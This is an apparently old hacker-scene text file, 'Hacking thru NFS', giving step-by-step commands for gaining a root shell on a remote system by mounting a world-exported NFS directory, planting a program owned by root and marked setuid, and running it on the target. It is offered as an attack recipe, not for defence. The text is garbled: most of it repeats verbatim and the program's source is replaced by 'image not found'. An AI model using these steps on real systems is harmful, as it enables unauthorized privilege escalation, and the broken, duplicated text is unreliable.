00101: Hacking thru NFS
By: CainYou are searching around for a system to hack. One of the things you should
check is whether they export any of the directories to everyone. Unfortunately
you need a shell on the system to do this. But if you do, then this is an
easy way to get root.
Your local system:
# showmount -r remote.com
Export list for remote.com:
/var/lib/stuff (everyone)
# mount remote.com:/var/lib/stuff /mnt
# cp hackprog /mnt
# chown root.root /mnt/hackprog
# chmod 4701 /mnt/hackprog
# umount /mnt
Their system:
$ cd /var/lib/stuff
$ hackprog
bash#
I chose the directories at random. But if you see anything like
/path/to/exported/directory (everyone)
in a showmount -r listing, you can mount that directory and have complete
access(read, write, execute) to that directory. So if you put a rewting
proggy:
main()
image not found
and make the owner root and chmod it to 4701(setuid) then you can run that
program from the system exporting that directory and get a rewt shell.
Unfortunately you must be root to mount an NFS, otherwise every system you got
on, you could obtain a rewt shell. But oh well.
check is whether they export any of the directories to everyone. Unfortunately
you need a shell on the system to do this. But if you do, then this is an
easy way to get root.
Your local system:
# showmount -r remote.com
Export list for remote.com:
/var/lib/stuff (everyone)
# mount remote.com:/var/lib/stuff /mnt
# cp hackprog /mnt
# chown root.root /mnt/hackprog
# chmod 4701 /mnt/hackprog
# umount /mnt
Their system:
$ cd /var/lib/stuff
$ hackprog
bash#
I chose the directories at random. But if you see anything like
/path/to/exported/directory (everyone)
in a showmount -r listing, you can mount that directory and have complete
access(read, write, execute) to that directory. So if you put a rewting
proggy:
main()
image not found
and make the owner root and chmod it to 4701(setuid) then you can run that
program from the system exporting that directory and get a rewt shell.
Unfortunately you must be root to mount an NFS, otherwise every system you got
on, you could obtain a rewt shell. But oh well.
Back Next
